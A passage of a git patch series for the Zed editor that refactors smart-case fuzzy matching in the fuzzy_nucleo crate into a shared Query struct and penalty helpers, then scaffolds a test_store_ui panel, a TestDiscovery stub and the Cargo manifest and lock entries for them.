a6b32f6e1cc1b9..9080d102a2e891 100644 --- a/crates/fuzzy_nucleo/src/fuzzy_nucleo.rs +++ b/crates/fuzzy_nucleo/src/fuzzy_nucleo.rs @@ -2,6 +2,9 @@ mod matcher; mod paths; mod strings; +use fuzzy::CharBag; +use nucleo::pattern::{AtomKind, CaseMatching, Normalization, Pattern}; + pub use paths::{ PathMatch, PathMatchCandidate, PathMatchCandidateSet, match_fixed_path_set, match_path_sets, }; @@ -45,6 +48,83 @@ impl LengthPenalty { } } +// Matching is always case-insensitive at the nucleo level — using +// `CaseMatching::Smart` there would *reject* candidates whose capitalization +// doesn't match the query, breaking pickers like the command palette +// (`"Editor: Backspace"` against the action named `"editor: backspace"`). +// `Case::Smart` is honored as a *scoring hint* instead: when the query +// contains uppercase, candidates whose matched characters disagree in case +// are downranked by a per-mismatch penalty rather than dropped. +pub(crate) struct Query { + pub(crate) pattern: Pattern, + /// Non-whitespace query chars in input order, populated only when a smart-case + /// penalty will actually be charged. Aligns 1:1 with the indices appended by + /// `Pattern::indices` (atom-order, needle-order within each atom). + pub(crate) query_chars: Option>, + pub(crate) char_bag: CharBag, +} + +impl Query { + pub(crate) fn build(query: &str, case: Case) -> Option { + if query.chars().all(char::is_whitespace) { + return None; + } + let normalized = query.split_whitespace().collect::>().join(" "); + let pattern = Pattern::new( + &normalized, + CaseMatching::Ignore, + Normalization::Smart, + AtomKind::Fuzzy, + ); + let wants_case_penalty = case.is_smart() && query.chars().any(|c| c.is_uppercase()); + let query_chars = + wants_case_penalty.then(|| query.chars().filter(|c| !c.is_whitespace()).collect()); + Some(Query { + pattern, + query_chars, + char_bag: CharBag::from(query), + }) + } +} + +#[inline] +pub(crate) fn count_case_mismatches( + query_chars: Option<&[char]>, + matched_chars: &[u32], + candidate: &str, + candidate_chars: &mut Vec, +) -> u32 { + let Some(query_chars) = query_chars else { + return 0; + }; + if query_chars.len() != matched_chars.len() { + return 0; + } + candidate_chars.clear(); + candidate_chars.extend(candidate.chars()); + let mut mismatches: u32 = 0; + for (&query_char, &pos) in query_chars.iter().zip(matched_chars) { + if let Some(&candidate_char) = candidate_chars.get(pos as usize) + && candidate_char != query_char + && candidate_char.eq_ignore_ascii_case(&query_char) + { + mismatches += 1; + } + } + mismatches +} + +const SMART_CASE_PENALTY_PER_MISMATCH: f64 = 0.9; + +#[inline] +pub(crate) fn case_penalty(mismatches: u32) -> f64 { + if mismatches == 0 { + 1.0 + } else { + SMART_CASE_PENALTY_PER_MISMATCH.powi(mismatches as i32) + } +} + /// Reconstruct byte-offset match positions from a list of matched char offsets /// that is already sorted ascending and deduplicated. pub(crate) fn positions_from_sorted(s: &str, sorted_char_indices: &[u32]) -> Vec { diff --git a/crates/fuzzy_nucleo/src/paths.rs b/crates/fuzzy_nucleo/src/paths.rs index dd4594ce37e522..6aaabfeb50ecb4 100644 --- a/crates/fuzzy_nucleo/src/paths.rs +++ b/crates/fuzzy_nucleo/src/paths.rs @@ -9,12 +9,12 @@ use std::{ use util::{paths::PathStyle, rel_path::RelPath}; use nucleo::Utf32Str; -use nucleo::pattern::{Atom, AtomKind, CaseMatching, Normalization}; +use nucleo::pattern::Pattern; use fuzzy::CharBag; use crate::matcher::{self, LENGTH_PENALTY}; -use crate::{Cancelled, Case, positions_from_sorted}; +use crate::{Cancelled, Case, Query, case_penalty, count_case_mismatches, positions_from_sorted}; #[derive(Clone, Debug)] pub struct PathMatchCandidate<'a> { @@ -96,47 +96,6 @@ impl Ord for PathMatch { } } -// Path matching is always case-insensitive at the nucleo level. `Case::Smart` -// is honored as a *scoring hint*: when the query contains uppercase, candidates -// whose matched characters disagree in case are downranked by a factor per -// mismatch rather than dropped. This keeps `"Editor: Backspace"` matching -// `"editor: backspace"` while still preferring exact-case hits. -const SMART_CASE_PENALTY_PER_MISMATCH: f64 = 0.9; - -pub(crate) fn make_atoms(query: &str) -> Vec { - query - .split_whitespace() - .map(|word| { - Atom::new( - word, - CaseMatching::Ignore, - Normalization::Smart, - AtomKind::Fuzzy, - false, - ) - }) - .collect() -} - -// Only populated when we will actually charge a smart-case penalty, so the hot -// path can iterate a plain `&[Atom]` and ignore this slice entirely. -fn make_source_words(query: &str, case: Case) -> Option>> { - (case.is_smart() && query.chars().any(|c| c.is_uppercase())).then(|| { - query - .split_whitespace() - .map(|word| word.chars().collect()) - .collect() - }) -} - -fn case_penalty(mismatches: u32) -> f64 { - if mismatches == 0 { - 1.0 - } else { - SMART_CASE_PENALTY_PER_MISMATCH.powi(mismatches as i32) - } -} - pub(crate) fn distance_between_paths(path: &RelPath, relative_to: &RelPath) -> usize { let mut path_components = path.components(); let mut relative_components = relative_to.components(); @@ -150,34 +109,34 @@ pub(crate) fn distance_between_paths(path: &RelPath, relative_to: &RelPath) -> u path_components.count() + relative_components.count() + 1 } +#[inline] fn get_filename_match_bonus( candidate_buf: &str, - query_atoms: &[Atom], + pattern: &Pattern, matcher: &mut nucleo::Matcher, ) -> f64 { - let filename = match std::path::Path::new(candidate_buf).file_name() { - Some(f) => f.to_str().unwrap_or(""), - None => return 0.0, - }; - if filename.is_empty() || query_atoms.is_empty() { + let Some(filename) = std::path::Path::new(candidate_buf) + .file_name() + .and_then(|f| f.to_str()) + .filter(|f| !f.is_empty()) + else { return 0.0; - } + }; let mut buf = Vec::new(); let haystack = Utf32Str::new(filename, &mut buf); - let mut total_score = 0u32; - for atom in query_atoms { - if let Some(score) = atom.score(haystack, matcher) { - total_score = total_score.saturating_add(score as u32); - } - } - total_score as f64 / filename.len().max(1) as f64 + let score: u32 = pattern + .atoms + .iter() + .filter_map(|atom| atom.score(haystack, matcher)) + .map(|s| s as u32) + .sum(); + + score as f64 / filename.len().max(1) as f64 } fn path_match_helper<'a>( matcher: &mut nucleo::Matcher, - atoms: &[Atom], - source_words: Option<&[Vec]>, - query_bag: CharBag, + query: &Query, candidates: impl Iterator>, results: &mut Vec, worktree_id: usize, @@ -197,7 +156,6 @@ fn path_match_helper<'a>( let path_prefix_len = candidate_buf.len(); let mut buf = Vec::new(); let mut matched_chars: Vec = Vec::new(); - let mut atom_matched_chars = Vec::new(); let mut candidate_chars: Vec = Vec::new(); for candidate in candidates { buf.clear(); @@ -206,7 +164,7 @@ fn path_match_helper<'a>( return Err(Cancelled); } - if !candidate.char_bag.is_superset(query_bag) { + if !candidate.char_bag.is_superset(query.char_bag) { continue; } @@ -219,70 +177,45 @@ fn path_match_helper<'a>( let haystack = Utf32Str::new(&candidate_buf, &mut buf); - if source_words.is_some() { - candidate_chars.clear(); - candidate_chars.extend(candidate_buf.chars()); - } - - let mut total_score: u32 = 0; - let mut case_mismatches: u32 = 0; - let mut all_matched = true; - - for (atom_idx, atom) in atoms.iter().enumerate() { - atom_matched_chars.clear(); - let Some(score) = atom.indices(haystack, matcher, &mut atom_matched_chars) else { - all_matched = false; - break; - }; - total_score = total_score.saturating_add(score as u32); - if let Some(source_words) = source_words { - let query_chars = &source_words[atom_idx]; - if query_chars.len() == atom_matched_chars.len() { - for (&query_char, &pos) in query_chars.iter().zip(&atom_matched_chars) { - if let Some(&candidate_char) = candidate_chars.get(pos as usize) - && candidate_char != query_char - && candidate_char.eq_ignore_ascii_case(&query_char) - { - case_mismatches += 1; - } - } - } - } - matched_chars.extend_from_slice(&atom_matched_chars); - } - - if all_matched && !atoms.is_empty() { - matched_chars.sort_unstable(); - matched_chars.dedup(); - - let length_penalty = candidate_buf.len() as f64 * LENGTH_PENALTY; - let filename_bonus = get_filename_match_bonus(&candidate_buf, atoms, matcher); - let positive = (total_score as f64 + filename_bonus) * case_penalty(case_mismatches); - let adjusted_score = positive - length_penalty; - let positions = positions_from_sorted(&candidate_buf, &matched_chars); - - results.push(PathMatch { - score: adjusted_score, - positions, - worktree_id, - path: if root_is_file { - Arc::clone(path_prefix) - } else { - candidate.path.into() - }, - path_prefix: if root_is_file { - RelPath::empty().into() - } else { - Arc::clone(path_prefix) - }, - is_dir: candidate.is_dir, - distance_to_relative_ancestor: relative_to - .as_ref() - .map_or(usize::MAX, |relative_to| { - distance_between_paths(candidate.path, relative_to.as_ref()) - }), - }); - } + let Some(score) = query.pattern.indices(haystack, matcher, &mut matched_chars) else { + continue; + }; + + let case_mismatches = count_case_mismatches( + query.query_chars.as_deref(), + &matched_chars, + &candidate_buf, + &mut candidate_chars, + ); + + matched_chars.sort_unstable(); + matched_chars.dedup(); + + let length_penalty = candidate_buf.len() as f64 * LENGTH_PENALTY; + let filename_bonus = get_filename_match_bonus(&candidate_buf, &query.pattern, matcher); + let positive = (score as f64 + filename_bonus) * case_penalty(case_mismatches); + let adjusted_score = positive - length_penalty; + let positions = positions_from_sorted(&candidate_buf, &matched_chars); + + results.push(PathMatch { + score: adjusted_score, + positions, + worktree_id, + path: if root_is_file { + Arc::clone(path_prefix) + } else { + candidate.path.into() + }, + path_prefix: if root_is_file { + RelPath::empty().into() + } else { + Arc::clone(path_prefix) + }, + is_dir: candidate.is_dir, + distance_to_relative_ancestor: relative_to.as_ref().map_or(usize::MAX, |relative_to| { + distance_between_paths(candidate.path, relative_to.as_ref()) + }), + }); } Ok(()) } @@ -296,14 +229,14 @@ pub fn match_fixed_path_set( max_results: usize, path_style: PathStyle, ) -> Vec { + let Some(query) = Query::build(query, case) else { + return Vec::new(); + }; + let mut config = nucleo::Config::DEFAULT; config.set_match_paths(); let mut matcher = matcher::get_matcher(config); - let atoms = make_atoms(query); - let source_words = make_source_words(query, case); - let query_bag = CharBag::from(query); - let root_is_file = worktree_root_name.is_some() && candidates.iter().all(|c| c.path.is_empty()); let path_prefix = worktree_root_name.unwrap_or_else(|| RelPath::empty().into()); @@ -312,9 +245,7 @@ pub fn match_fixed_path_set( path_match_helper( &mut matcher, - &atoms, - source_words.as_deref(), - query_bag, + &query, candidates.into_iter(), &mut results, worktree_id, @@ -352,9 +283,9 @@ pub async fn match_path_sets<'a, Set: PathMatchCandidateSet<'a>>( query.to_owned() }; - let atoms = make_atoms(&query); - let source_words = make_source_words(&query, case); - let query_bag = CharBag::from(query.as_str()); + let Some(query) = Query::build(&query, case) else { + return Vec::new(); + }; let num_cpus = executor.num_cpus().min(path_count); let segment_size = path_count.div_ceil(num_cpus); @@ -371,8 +302,7 @@ pub async fn match_path_sets<'a, Set: PathMatchCandidateSet<'a>>( .zip(matchers.iter_mut()) .enumerate() { - let atoms = atoms.clone(); - let source_words = source_words.clone(); + let query = &query; let relative_to = relative_to.clone(); scope.spawn(async move { let segment_start = segment_idx * segment_size; @@ -389,9 +319,7 @@ pub async fn match_path_sets<'a, Set: PathMatchCandidateSet<'a>>( if path_match_helper( matcher, - &atoms, - source_words.as_deref(), - query_bag, + query, candidates, results, candidate_set.id(), diff --git a/crates/fuzzy_nucleo/src/strings.rs b/crates/fuzzy_nucleo/src/strings.rs index 4f3f02767a8900..b72c7da205da96 100644 --- a/crates/fuzzy_nucleo/src/strings.rs +++ b/crates/fuzzy_nucleo/src/strings.rs @@ -8,61 +8,14 @@ use std::{ use gpui::{BackgroundExecutor, SharedString}; use nucleo::Utf32Str; -use nucleo::pattern::{Atom, AtomKind, CaseMatching, Normalization}; use crate::{ - Cancelled, Case, LengthPenalty, + Cancelled, Case, LengthPenalty, Query, case_penalty, count_case_mismatches, matcher::{self, LENGTH_PENALTY}, positions_from_sorted, }; use fuzzy::CharBag; -// String matching is always case-insensitive at the nucleo level — using -// `CaseMatching::Smart` there would reject queries whose capitalization -// doesn't match the candidate, breaking pickers like the command palette -// (`"Editor: Backspace"` against the action named `"editor: backspace"`). -// `Case::Smart` is still honored as a *scoring hint*: when the query -// contains uppercase, candidates whose matched characters disagree in case -// are downranked rather than dropped. -const SMART_CASE_PENALTY_PER_MISMATCH: f64 = 0.9; - -struct Query { - atoms: Vec, - source_words: Option>>, - char_bag: CharBag, -} - -impl Query { - fn build(query: &str, case: Case) -> Option { - let mut atoms = Vec::new(); - let mut source_words = Vec::new(); - let wants_case_penalty = case.is_smart() && query.chars().any(|c| c.is_uppercase()); - - for word in query.split_whitespace() { - atoms.push(Atom::new( - word, - CaseMatching::Ignore, - Normalization::Smart, - AtomKind::Fuzzy, - false, - )); - if wants_case_penalty { - source_words.push(word.chars().collect()); - } - } - - if atoms.is_empty() { - return None; - } - - Some(Query { - atoms, - source_words: wants_case_penalty.then_some(source_words), - char_bag: CharBag::from(query), - }) - } -} - #[derive(Clone, Debug)] pub struct StringMatchCandidate { pub id: usize, @@ -281,7 +234,6 @@ where { let mut buf = Vec::new(); let mut matched_chars: Vec = Vec::new(); - let mut atom_matched_chars = Vec::new(); let mut candidate_chars: Vec = Vec::new(); for candidate in candidates { @@ -297,69 +249,37 @@ where continue; } - let haystack: Utf32Str = Utf32Str::new(&borrowed.string, &mut buf); + let haystack: Utf32Str = Utf32Str::new(borrowed.string.as_ref(), &mut buf); - if query.source_words.is_some() { - candidate_chars.clear(); - candidate_chars.extend(borrowed.string.chars()); - } + let Some(score) = query.pattern.indices(haystack, matcher, &mut matched_chars) else { + continue; + }; - let mut total_score: u32 = 0; - let mut case_mismatches: u32 = 0; - let mut all_matched = true; - - for (atom_idx, atom) in query.atoms.iter().enumerate() { - atom_matched_chars.clear(); - let Some(score) = atom.indices(haystack, matcher, &mut atom_matched_chars) else { - all_matched = false; - break; - }; - total_score = total_score.saturating_add(score as u32); - if let Some(source_words) = query.source_words.as_deref() { - let query_chars = &source_words[atom_idx]; - if query_chars.len() == atom_matched_chars.len() { - for (&query_char, &pos) in query_chars.iter().zip(&atom_matched_chars) { - if let Some(&candidate_char) = candidate_chars.get(pos as usize) - && candidate_char != query_char - && candidate_char.eq_ignore_ascii_case(&query_char) - { - case_mismatches += 1; - } - } - } - } - matched_chars.extend_from_slice(&atom_matched_chars); - } + let case_mismatches = count_case_mismatches( + query.query_chars.as_deref(), + &matched_chars, + borrowed.string.as_ref(), + &mut candidate_chars, + ); - if all_matched { - matched_chars.sort_unstable(); - matched_chars.dedup(); + matched_chars.sort_unstable(); + matched_chars.dedup(); - let positive = total_score as f64 * case_penalty(case_mismatches); - let adjusted_score = - positive - length_penalty_for(borrowed.string.as_ref(), length_penalty); - let positions = positions_from_sorted(borrowed.string.as_ref(), &matched_chars); + let positive = score as f64 * case_penalty(case_mismatches); + let adjusted_score = + positive - length_penalty_for(borrowed.string.as_ref(), length_penalty); + let positions = positions_from_sorted(borrowed.string.as_ref(), &matched_chars); - results.push(StringMatch { - candidate_id: borrowed.id, - score: adjusted_score, - positions, - string: borrowed.string.clone(), - }); - } + results.push(StringMatch { + candidate_id: borrowed.id, + score: adjusted_score, + positions, + string: borrowed.string.clone(), + }); } Ok(()) } -#[inline] -fn case_penalty(mismatches: u32) -> f64 { - if mismatches == 0 { - 1.0 - } else { - SMART_CASE_PENALTY_PER_MISMATCH.powi(mismatches as i32) - } -} - #[inline] fn length_penalty_for(s: &str, length_penalty: LengthPenalty) -> f64 { if length_penalty.is_on() { From 11942f95af8ae7188a71dd69931eb1f1f56b752e Mon Sep 17 00:00:00 2001 From: BEKs Date: Thu, 7 May 2026 17:15:12 +0300 Subject: [PATCH 225/231] created test_store ui component --- crates/test_store_ui/src/test_panel.rs | 39 +++++++++++++++++++++++ crates/test_store_ui/src/test_store_ui.rs | 14 ++++++++ 2 files changed, 53 insertions(+) create mode 100644 crates/test_store_ui/src/test_panel.rs create mode 100644 crates/test_store_ui/src/test_store_ui.rs diff --git a/crates/test_store_ui/src/test_panel.rs b/crates/test_store_ui/src/test_panel.rs new file mode 100644 index 00000000000000..b89f0e63fdca24 --- /dev/null +++ b/crates/test_store_ui/src/test_panel.rs @@ -0,0 +1,39 @@ +use gpui::{AppContext, AsyncWindowContext, Context, Entity, WeakEntity, Window}; + +use anyhow; +use workspace::Workspace; + +#[derive(Debug, Default)] +pub struct TestStorePanel { + test_suite_count: usize, + test_case_count: usize, + failed_test_count: usize, + passed_test_count: usize, + skipped_test_count: usize, +} + +impl TestStorePanel { + pub fn new( + workspace: &mut Workspace, + window: &mut Window, + cx: &mut Context, + ) -> Entity { + cx.new(|cx| Self { + test_case_count: 0, + test_suite_count: 0, + failed_test_count: 0, + passed_test_count: 0, + skipped_test_count: 0, + }) + } + + pub fn load( + workspace: WeakEntity, + mut cx: AsyncWindowContext, + ) -> anyhow::Result> { + workspace.update_in(&mut cx, |workspace, window, cx| { + let panel = Self::new(workspace, window, cx); + panel + }) + } +} diff --git a/crates/test_store_ui/src/test_store_ui.rs b/crates/test_store_ui/src/test_store_ui.rs new file mode 100644 index 00000000000000..dbee1cafed5bf9 --- /dev/null +++ b/crates/test_store_ui/src/test_store_ui.rs @@ -0,0 +1,14 @@ +use gpui::App; + +pub mod test_panel; + + +pub fn init(cx: &mut App) {} + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn it_works() {} +} From 5d732b3f76ae1c1970f154597e6d0b66dcfc659b Mon Sep 17 00:00:00 2001 From: BEKs Date: Thu, 7 May 2026 17:15:44 +0300 Subject: [PATCH 226/231] registered test_store_ui in zed project --- crates/test_store_ui/Cargo.toml | 19 +++++++++++++++++++ crates/zed/src/zed.rs | 3 +++ 2 files changed, 22 insertions(+) create mode 100644 crates/test_store_ui/Cargo.toml diff --git a/crates/test_store_ui/Cargo.toml b/crates/test_store_ui/Cargo.toml new file mode 100644 index 00000000000000..85ae541711a9c3 --- /dev/null +++ b/crates/test_store_ui/Cargo.toml @@ -0,0 +1,19 @@ +[package] +name = "test_store_ui" +version = "0.1.0" +publish.workspace = true +edition.workspace = true + +[lib] +path = "src/test_store_ui.rs" +doctest = false + +[dependencies] + +anyhow.workspace = true +workspace.workspace = true +project.workspace = true +gpui.workspace = true + +[lints] +workspace = true diff --git a/crates/zed/src/zed.rs b/crates/zed/src/zed.rs index 180d85440df347..e9cb5b87ca4e06 100644 --- a/crates/zed/src/zed.rs +++ b/crates/zed/src/zed.rs @@ -70,6 +70,7 @@ use settings::{ update_settings_file, }; use sidebar::Sidebar; +use test_store_ui::test_panel::TestStorePanel; use std::{ borrow::Cow, @@ -726,8 +727,10 @@ fn initialize_panels(window: &mut Window, cx: &mut Context) -> Task>> + 'static, workspace_handle: WeakEntity, From 6f04029f7c9b904a1de953a3726408108c9e29d1 Mon Sep 17 00:00:00 2001 From: BEKs Date: Thu, 7 May 2026 17:15:55 +0300 Subject: [PATCH 227/231] Update Cargo.toml --- crates/zed/Cargo.toml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/crates/zed/Cargo.toml b/crates/zed/Cargo.toml index d8ac8be3369f7f..bd726d1124d15f 100644 --- a/crates/zed/Cargo.toml +++ b/crates/zed/Cargo.toml @@ -197,6 +197,8 @@ tasks_ui.workspace = true telemetry.workspace = true telemetry_events.workspace = true terminal_view.workspace = true +test_store.workspace = true +test_store_ui.workspace = true theme.workspace = true theme_settings.workspace = true theme_extension.workspace = true From 0775d8f71117ecf22aee55b19f634b09fed9a0a4 Mon Sep 17 00:00:00 2001 From: BEKs Date: Thu, 7 May 2026 17:16:27 +0300 Subject: [PATCH 228/231] added missing details to test_case and test_suite --- crates/test_store/src/test_case.rs | 2 ++ crates/test_store/src/test_suite.rs | 2 ++ 2 files changed, 4 insertions(+) diff --git a/crates/test_store/src/test_case.rs b/crates/test_store/src/test_case.rs index 72959ddef491d3..bbe8e44347f113 100644 --- a/crates/test_store/src/test_case.rs +++ b/crates/test_store/src/test_case.rs @@ -13,6 +13,8 @@ pub struct TestCase { pub runs: u16, // Tells the error information provided after the execution of the test case pub error_info: Option, + // Tells the name of the test case + pub name: String, } impl TestCase {} diff --git a/crates/test_store/src/test_suite.rs b/crates/test_store/src/test_suite.rs index eb7e8990ff5a38..97541396cfb833 100644 --- a/crates/test_store/src/test_suite.rs +++ b/crates/test_store/src/test_suite.rs @@ -12,5 +12,7 @@ pub struct TestSuite { pub count: u32, // The test cases in the test suite pub cases: Vec, + // Tells the name of the test suite + pub name: String, } impl TestSuite {} From b604fc9b6f8f0daef95f0d497094274d90a70163 Mon Sep 17 00:00:00 2001 From: BEKs Date: Thu, 7 May 2026 17:17:44 +0300 Subject: [PATCH 229/231] created scaffold for test_discovery --- crates/test_store/src/test_discovery.rs | 38 +++++++++++++++++++++++++ 1 file changed, 38 insertions(+) diff --git a/crates/test_store/src/test_discovery.rs b/crates/test_store/src/test_discovery.rs index e69de29bb2d1d6..07bb65b4b2826d 100644 --- a/crates/test_store/src/test_discovery.rs +++ b/crates/test_store/src/test_discovery.rs @@ -0,0 +1,38 @@ +use gpui::{App, AppContext, Context}; +use project::Project; +use workspace; + +#[derive(Debug, Default)] +pub struct TestDiscovery; + +impl TestDiscovery { + pub fn init(ctx: &mut App, project: &Project) -> Self { + Self + } + + // scan project to find all code files in project + pub fn scan(&self, cx: Context, proj: &Project) { + for workree in proj.worktrees(&cx).into_iter() { + let snapshot = workree.read(&cx).snapshot(); + + for entry in snapshot.entries(true, 0) { + // entry + // find test suites in each file. + if !entry.is_file() { + continue; + } + + // check for source file type + // Can I use any of the APIs in language crate to check for source files? + } + } + } +} + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn test_initializet_test_discovery() {} +} From 89220f714d4cb689fb325c81798103ed9a64f9c2 Mon Sep 17 00:00:00 2001 From: BEKs Date: Thu, 7 May 2026 17:18:12 +0300 Subject: [PATCH 230/231] added dependencies --- Cargo.toml | 4 +++- crates/test_store/Cargo.toml | 3 +++ 2 files changed, 6 insertions(+), 1 deletion(-) diff --git a/Cargo.toml b/Cargo.toml index 683592a35b9aba..7a4ba9650ec5bf 100644 --- a/Cargo.toml +++ b/Cargo.toml @@ -251,7 +251,7 @@ members = [ "tooling/compliance", "tooling/perf", "tooling/xtask", - "crates/test_store", + "crates/test_store", "crates/test_store_ui", ] default-members = ["crates/zed"] @@ -456,6 +456,8 @@ telemetry = { path = "crates/telemetry" } telemetry_events = { path = "crates/telemetry_events" } terminal = { path = "crates/terminal" } terminal_view = { path = "crates/terminal_view" } +test_store = { path = "crates/test_store" } +test_store_ui = { path = "crates/test_store_ui" } text = { path = "crates/text" } theme = { path = "crates/theme" } theme_extension = { path = "crates/theme_extension" } diff --git a/crates/test_store/Cargo.toml b/crates/test_store/Cargo.toml index 034213b9ba597b..46fbcc11b59ffb 100644 --- a/crates/test_store/Cargo.toml +++ b/crates/test_store/Cargo.toml @@ -10,6 +10,9 @@ path = "src/test_store.rs" doctest = false [dependencies] +project.workspace = true +workspace.workspace = true +gpui.workspace = true [lints] workspace = true From 825196bcf232a8f114bef0e1bb6e2c29948b085b Mon Sep 17 00:00:00 2001 From: BEKs Date: Thu, 7 May 2026 17:18:47 +0300 Subject: [PATCH 231/231] test_store package lock --- Cargo.lock | 17 +++++++++++++++++ 1 file changed, 17 insertions(+) diff --git a/Cargo.lock b/Cargo.lock index f35cb8bbfb2f23..6fdf7c7679f90d 100644 --- a/Cargo.lock +++ b/Cargo.lock @@ -17866,6 +17866,21 @@ dependencies = [ [[package]] name = "test_store" version = "0.1.0" +dependencies = [ + "gpui", + "project", + "workspace", +] + +[[package]] +name = "test_store_ui" +version = "0.1.0" +dependencies = [ + "anyhow", + "gpui", + "project", + "workspace", +] [[package]] name = "text" @@ -22538,6 +22553,8 @@ dependencies = [ "telemetry_events", "tempfile", "terminal_view", + "test_store", + "test_store_ui", "theme", "theme_extension", "theme_selector",